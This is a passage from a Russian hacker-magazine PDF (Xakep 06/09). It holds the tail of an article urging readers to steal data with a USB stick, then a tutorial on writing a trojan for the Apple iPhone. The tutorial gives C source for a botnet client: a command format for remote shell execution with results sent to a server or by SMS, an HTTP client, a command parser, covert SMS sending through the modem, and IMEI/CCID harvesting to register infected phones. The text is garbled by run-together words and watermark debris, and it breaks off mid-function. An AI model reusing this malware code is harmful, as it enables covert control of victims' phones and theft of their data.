Чуть не забыл! Чтобы собственная флешка не ополчилась на тебя, необходимо залезть по адресу «Пуск Æ Настройка Æ Панель управления Æ Система Æ Дополнительно Æ Переменные среды» и

прописать там нужные идентификаторы. Вот список уже поддерживаемых:

BASE

DRUG

GUARD

SPY

Посути, этоглобальныепеременныетвоейоперационнойсистемы, которыевосстанавливаютсяприкаждомвходевнее. Пользуйсяна здоровье.

ОБСУДИМИТОГИ

Мыполучили, своегородаплатформу, котораябудетотличноработать нетольконатвоеймашине, ноигде-тотам, вчужойквартире, похищая нужныетебеданные. Иневажно, ктоты, мойчитатель, утебявсегда

найдутсявопросыизадачи, скоторымимоглабысправитьсямоясистема. Допустим, тыстудент-раздолбай; тогдафлешкапоможеттебедостатьне толькокурсовыеутвоегопрепода, ноичертежиипрочуюхрень, которая поставляетсявкомплектескурсачом. Еслитыужепоимелвсюсетьвуза ипомогаешьсотрудникамчерезRadmin раскладыватьпасьянс, то можешьпойтипрогулятьсядоближайшегосалонасотовойсвязи. Есть шансзаполучитьвсвоимохнатыерукиихплатежныхклиентов— выгодуоценивайсам. Еслитебеиэтогомало, тохочуотметитьцелыйряд ситуаций, когда, недайБог, сотрудникСбербанкасогласитсяпринять ствоейфлешкиотсканированныйтобойчек.

Болеетого,сейчасвсенакаждомуглувужасекричатотэпидемиивируса Conficker,ачемтыхуже?Неужели,имеявсвоемраспоряжениитакоймощныйинструмент,тыневсостояниинаписатьсвойтренировочныйботнет? Однимсловом—срочнобегиискатьфлеш-дискU3шноготипа.Впрочем, еслинемногопозаниматьсямазохизмом,сойдетлюбаяфлешка.z

XÀÊÅÐ 06 /126/ 09

063

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>m

 

w Click

to

 

 

 

взлом

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

D0ZNP

/ HTTP://OXOD.RU /

КОНЬВЯБЛОКАХ

ПИШЕМ ТРОЯНДЛЯAPPLE IPHONE

В прошлых статьях я описал основные уязвимости Apple iPhone, дал инструкции по созданию автоматического сканера безопасности на базе точки доступа и рассказал о концепции ботнета для телефонов. Сегодня я подробно опишу создание трояна для

Apple iPhone.

>> взлом

ФОРМАТ УПРАВЛЯЮЩЕЙКОМАНДЫ

Первое, счегонадоначатьнаписаниетрояна— разработкаформатакоманды, которуюсервер будетпередаватьклиентам(зараженнымтелефонам). Япредлагаювоттакойвид:

1.Команда состоит из шести частей, разделенных символом "%"

2.Первая часть:

at% AT-команда для модема

sm% команда отправки СМС

sh% команда шелла (например, ls, whoami, ping www.ru)

tg% команда настройки работы самого трояна 3. Третьи и вторая части — аргументы

команды из первой части. Например:

sm%79101010101%TEST is OK%<хвост команды> 4. Четвертая часть — тип отправки

результата команды, может принимать значения:

%ws% отправка http-запросом параметра GET

%sm% отправка «внутри» SMS-сообще- ния

5. Пятая и шестая части - аргументы для отправки команды, например:

%79102020202% номер телефона в международном формате

%192.168.1.100%/master-server/res. php?res=%

Примеры команд:

sm%79101010101%test is OK%0%0%0% — отправить СМС с текстом: "test is OK" на номер +79101010101

sh%ping –c10 www.ru%0%ws%192. 168.1.100%/master-server/res. php?res=% — выполнить команду шелла «ping www.ru» и выслать результат выполнения на 192.168.1.100

tg%3600%0%0%0%0% — установить интервал получения команды с сервера равным 3600 секунд

Парусловоразделителе: ямаксимальнохотел использоватькомандышелла, поэтомуоставил всеспецсимволынаиспользованиевскриптах (чтобыможнобыловыполнятьразныетамcat / dev/random > /tmp/fuck-memory-economy или ls / | grep txt ипр.). Такимобразом, разделителемсталпроцент— %. Чтокасаетсяобщейконцепциикоманды, тоздесьвсетожеочевидно.

Первыетрипараметра— управляющаячасть, инструкциятипа«чтосделать». Вторыетри параметра— ответнаячасть, инструкциятипа «кудаскинутьрезультатвыполнения». Если сэтимвсепонятно, тонечеготянутьрезину, переходимккодингу.

АРХИТЕКТУРАПРОГРАММЫ

Всефункциияразнеспоотдельнымфайламв зависимостиотсмысловойнагрузки. Основной файлtrojan.c максимальнооблегченотненужногокода. Вотсписокфайловиихназначений:

trojan.c Основной файл с main() функцией программы

Makefile Инструкции утилите make для сборки трояна

./cmd: Разбор строки с командой и заполнение структуры

cmd-parser.c cmd-parser.h

./http: HTTP-клиент. Отправка запросов, возвращение результата http-client.c

http-client.h

064

XÀÊÅÐ 06 /126/ 09

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

>>

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

взломw

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

o

m

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

ПРОСМОТРВСЕХЗАРАЖЕННЫХТЕЛЕФОНОВ

БРОДКАСТКОМАНДА. ЕЕВЫПОЛНЯТВСЕУСТ-

ВАДМИНКЕНАСЕРВЕРЕ

РОЙСТВА

./sms: Работа с AT-командами. Отправ-

*((struct in_addr *)he->h_addr);

ка СМС, получение IMEI и CCID

memset(&(their_addr.sin_zero),

sms-funcs.c

'\0', 8);

sms-funcs.h

if(connect(sockfd,

 

(struct sockaddr *)&their_addr,

./structs: Описание структуры команды

sizeof(struct sockaddr)) == -1)

COMMAND

exit(1);

command.c

 

 

if((numbytes = send(sockfd, msg,

./utils: Утилиты. Concat для коррект-

strlen(msg), 0)) == -1)

ного слияния двух строк в одну

{

utils-concat.c

exit(1);

utils-concat.h

}

 

 

ПИШЕМПРОСТЕНЬКИЙ

int bytes = 0;

HTTPCLIENT

bytes = (recv(sockfd, buf,

Забиратькомандыссерверанаштроянбудет

MAXDATASIZE-1, 0));

поHTTP. Поэтомунадонаписатьпростенький

if (bytes < 1)

клиентнасокетах. Готовыевещивнашемслучае

{

бестолковы, аформатhttp-запроса, думаю, ты

exit(1);

помнишьнаизусть. Еслинепомнишь— ничего

}

страшного, напомню. Использоватьмыбудем

else if(bytes<MAXDATASIZE)

толькостандартныебиблиотеки: netdb.h, sys/

{

types.h, netinet/in.h, sys/socket.h. Вобщем, полу-

}

читсяпримернотак:

else

 

exit(1);

char* sendHttpRequest(char *host,

close(sockfd);

char *url)

 

{

int sockfd, numbytes; char buf[MAXDATASIZE]; struct hostent *he;

struct sockaddr_in their_addr; char* msg[2048];

sprintf(msg, "GET %s HTTP/1.1\r\n", url);

if (strlen(host)!=0)

{

sprintf(msg, "%sHost: %s\r\n", msg, host);

}

sprintf(msg, "%s Cache-Control: no- cache\r\nUser-Agent: bad-trojan\r\n\ r\n", msg);

int received=0; if((he=gethostbyname(host)) == NULL)

exit(1);

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) exit(1);

their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT); their_addr.sin_addr =

return buf;

}

Тутнакладываютсяограниченияв2 Кбнастроку URL иответсервера. Еслиихбудетмалодля твоихцелей— увеличишьбезпроблем. Тольконе забудьочищатьпеременные, все-такичистыйС, никакихтебесборщиковмусора:).

ПАРСИМКОМАНДУСЕРВЕРА

Послетого, какмыполучилистрокускомандой, еенадоразобратьизаполнитьсоответствующую структуру. Самаструктуравыглядиттак:

struct COMMAND{ char ct[3]; char p1[257]; char p2[257]; char rt[3]; char r1[257]; char r2[257];

};

По-хорошему, типкомандыитипответанадо быловыставитьвint, нодоэтогорукиуменяне

дошли. Какговорится, сначаланапиши, потом оптимизируй. Такчто, этооставимнадомашнее задание. Теперьсампарсинг. Оносновывается набазовойфункцииstrtok, котораявыполняетза насразбиениестрокинатокеныпоспецсимволу

%.Вотисходник:

struct COMMAND parseCmd(char *resp){ char **parsed = (char *)

malloc(SIZE); int i=0;

for(i=0; i<SIZE; i++)

{

parsed[i] = (char*) malloc(MAX_SIZE);

}

if (strstr(resp, "cmd: ")!=NULL) { UCHAR cmd[1024]; strncpy(cmd,&resp[172],

(strlen(resp)-170) );

char * pch = strtok(cmd, "%"); i = 0;

while (pch!=NULL)

{

parsed[i]=pch;

pch = strtok (NULL, "%"); i++;

}

strncpy(COMMAND.ct, parsed[0], sizeof(COMMAND.ct));

strncpy(COMMAND.p1, parsed[1], sizeof(COMMAND.p1));

strncpy(COMMAND.p2, parsed[2], sizeof(COMMAND.p2));

strncpy(COMMAND.rt, parsed[3], sizeof(COMMAND.rt));

strncpy(COMMAND.r1, parsed[4], sizeof(COMMAND.r1));

strncpy(COMMAND.r2, parsed[5], sizeof(COMMAND.r2));

for (i=0; i<SIZE; i++) { parsed[i] = NULL;

}

return COMMAND;

}

return COMMAND;

}

Вродевсепонятно? Никакихособыхприемов здесьнеиспользовано. Толькопрошубыть аккуратнееспереполнениямибуфера. Код троянапоэтойчастиещепридетсяхорошенько допилить…

XÀÊÅÐ 06 /126/ 09

065

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

>>m

 

w Click

to

 

 

 

взлом

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

СПЕЦИАЛЬНАЯКОМАНДА. УНИТРОЯНСКИЙКОНЬ. АВТОПОРТРЕТ ВЫПОЛНЕНИЕСКРИПТА: DF -H;

КАЛЬНАДЛЯКАЖДОГОТЕЛЕФО-

ECHO «GOOD BYE»; REBOOT

НА. МОЖЕТЗАСТАВИТЬПЕРЕДАТЬ

 

ЛИЧНЫЕДАННЫЕ

 

ПОСЫЛАЕМАТ-КОМАНДЫ

Яочищаюочередьсообщений, чтобынезаморачиватьсяинеразбирать

МОДЕМУТЕЛЕФОНА

строкуответамодеманакомандуAT+CMGW. Поправильному, онавозвра-

Вмартовскомномереяужеприводилисходникпрограммыдляотправки

щаетномертвоегонабранногоСМС, далееегоинадоиспользоватьдля

СМС. Навсякийслучай, повторюосновныемоменты. Мыиспользуем

аргументаAT+CMSS. Утакогоподходаестьнебольшойнюанс— троянпре-

резервноесистемноеустройство/dev/tty.debug, черезкотороепосыла-

красноработает, носамтелефонСМСотправитьпослетакогоуженеможет.

ютсяАТ-команды. Основноеустройство/dev/tty заблокированородными

Приходитьсяперезагружаться. Вобщем, этотбагяоставилспециально,

демонамителефонаииспользоватьегонеполучится. Мыинициализируем

чтобытебетожебылочемзаняться:).

соединениенаскорости115200 бодвоттак:

ПомимоотправкиСМС, допишемещедвефункции, чтобыполучатьIMEI

 

телефонаиCCID. Этоуникальныеномера, ихможноиспользоватьдля

int InitConn(int speed)

идентификациикаждогозараженногообразца:

{

int fd = open("/dev/tty.debug", O_RDWR | O_NOCTTY); if(fd == -1) {

fprintf(stderr, "%i(%s)\n", errno, strerror(errno)); exit(1);

}

ioctl(fd, TIOCEXCL);

fcntl(fd, F_SETFL, 0); tcgetattr(fd, &term); gOriginalTTYAttrs = term; cfmakeraw(&term); cfsetspeed(&term, speed); term.c_cflag = CS8 | CLOCAL | CREAD; term.c_iflag = 0;

term.c_oflag = 0; term.c_lflag = 0; term.c_cc[VMIN] = 0; term.c_cc[VTIME] = 0; tcsetattr(fd, TCSANOW, &term); return fd;

}

Послеэтогоможнописатьвустройство:

void SendCmd(int fd, void *buf, size_t size)

{

if(write(fd, buf, size) == -1)

{

fprintf(stderr, "SendCmd error. %s\n", trerror(errno)); exit(1);

}

}

ДляотправкиСМСиспользуетсятакаяпоследовательностькоманд:

AT+CMGD=1 // удаляем все СМС из очереди, чтобы наше сообщение стало первым

AT+CMGF=1 // переводим модем в текстовый режим AT+CMGW=79000000000 // номер получателя

// Набираем само сообщение

AT+CMSS=1 // отправляем наше сообщение

char* getCCID(){ int fd;

fd = InitConn(115200); AT(fd);

SendCmd(fd, "AT+CCID\r",9); char* res = ReadResp(fd) ;

CloseConn(fd); return res;

}

char* getIMEI(){ int fd;

fd = InitConn(115200); AT(fd);

SendCmd(fd, "AT+CGSN\r",9); char* res = ReadResp(fd) ; CloseConn(fd);

return res;

}

Нувот, закончилисАТ-командами. Теперьможнообъединитьвсевместев main функции.

РЕГИСТРАЦИЯТЕЛЕФОНА ВБОТНЕТЕИПОЛУЧЕНИЕКОМАНДЫ

Чтобыхозяинзнал, чтовегоколлекциипоявилсяещеодинзверек, зараженномунадозарегистрироваться. Сточкизрениятрояна— этопросто ещеодинhttp-запрос. ВкачествепараметрапередаетIMEI телефонаи проверочныйкод. Код— этоспециальнаяфункция, вычисленнаяотIMEI. В прошлойстатьеяприводилееисходникнаPHP насторонесервера. Авот реализациянаС:

int getVKey(char* imei) {

if (strlen(imei)!=15) return -1; int vkey = 0;

int i = 0; int c = 0; int l = 0; int m = 0;

char *k = (char *)malloc(1); for (i=0; i<5; i++) {

066

XÀÊÅÐ 06 /126/ 09

Соседние файлы в папке журнал хакер